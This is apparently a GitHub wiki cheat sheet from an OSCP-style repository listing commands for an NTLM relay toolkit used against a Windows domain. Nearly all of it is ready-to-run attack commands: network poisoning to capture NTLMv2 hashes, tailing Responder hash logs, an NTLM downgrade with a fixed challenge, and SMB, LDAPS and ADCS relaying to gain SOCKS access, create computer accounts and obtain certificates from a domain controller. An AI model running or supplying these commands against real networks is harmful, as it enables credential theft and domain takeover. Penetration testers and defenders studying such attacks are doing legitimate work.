Standard attacks - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://github.com/nullenc0de/relaytoolkit

Tools:

  • toolkit

Attack - Initial Access testing:

# Start with analyze mode to identify opportunities:
sudo python3 toolkit.py --auto --analyze -i eth0
# Run full auto sequence when ready:
sudo python3 toolkit.py --auto -i eth0 -dc 192.168.1.10 -d corp.local
# Monitor captured hashes in Responder logs:
tail -f /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.10.txt

Under the hood:


Commands:

Auto mode

# Full automatic testing
sudo python3 toolkit.py --auto \
    -i eth0 \
    -dc 192.168.1.10 \
    -d corp.local \
    --target-range 192.168.1.0/24

# Analysis mode only (no poisoning)
sudo python3 toolkit.py --auto --analyze -i eth0

Basic collection

# Start hash collection
sudo python3 toolkit.py -i eth0

# With NTLM downgrade
sudo python3 toolkit.py -i eth0 -c 1122334455667788

SMB Relay

# SMB relay with SOCKS
sudo python3 toolkit.py -i eth0 --relay --relay-type smb --socks

# LDAPS relay for computer account creation
sudo python3 toolkit.py -i eth0 --relay --relay-type ldaps --dc-ip 192.168.1.10

# ADCS relay
sudo python3 toolkit.py -i eth0 --relay --relay-type adcs --dc-ip 192.168.1.10